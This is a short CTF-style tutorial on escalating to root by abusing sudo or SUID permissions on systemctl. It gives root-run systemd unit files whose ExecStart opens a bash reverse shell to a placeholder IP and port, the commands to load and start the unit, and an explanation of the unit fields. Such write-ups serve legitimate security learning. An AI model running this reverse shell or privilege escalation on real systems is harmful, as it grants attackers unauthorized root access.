How-to: systemctl sudo/suid Exploit Explained
1. Requirements
Case 0
You have the permissions to run /bin/systemctl as sudo or the SUID bit is set. This case is the easiest to deal with.
Case 1 Permissions (at least):
/bin/systemctl daemon-reload/bin/systemctl restart *.service
Case 2 Permissions (at least):
/bin/systemctl daemon-reload/bin/systemctl enable *.service->/bin/systemctl start *.service
2. Code
Case 0 and Case 1
root.service
[Unit]
Description=pwn
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'
Case 0 and Case 2
root.service
[Unit]
Description=pwn
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'
[Install]
WantedBy=multi-user.target
3. Exploiting
Case 0 and Case 1
- Edit/transfer the file
root.service - Run
systemctl daemon-reload - Run
systemctl restart root.service
Case 0 and Case 2
- Edit/transfer the file
root.service - Run
systemctl daemon-reload - Run
systemctl enable root.service - Run
systemctl start root.service
4. Explaination
The root.service file that we create here is a systemd.unit file, describing a service - that escalates us to root.
The Type=simple specifies that after the ExecStart=... process has been run, the unit is considered to be run successfully. The User=root specifies that we are running the above process as root. This is allowed since we are priviledged enough to run systemctl commands as root :D
NOTE:
The WantedBy line is only required if you want to work with systemctl enable command. That is, tell the system to load up this specific service while booting. Confused?
Here’s the thing. When we boot up a system, all the services having a RequiredBy and WantedBy are started up. Services not having them are not started. Think about it. The services that have dependencies are resolved. Those not having this line are not started simply because they are not required or wanted by anyone else. But, we are not rebooting the system during a CTF challenge. We can start this service manually - by using the start command. Thus, there is no need of the WantedBy line!
Checkout the below error message if I do not include the [Install] instructions and use the enable command.
┌──(kali㉿kali)-[/etc/systemd/system]
└─$ sudo systemctl enable root.service
The unit files have no installation config (WantedBy=, RequiredBy=, Also=,
Alias= settings in the [Install] section, and DefaultInstance= for template
units). This means they are not meant to be enabled using systemctl.
...
Thus, only if you want to use the enable command, include the [Install] instructions. Else, its okay to skip!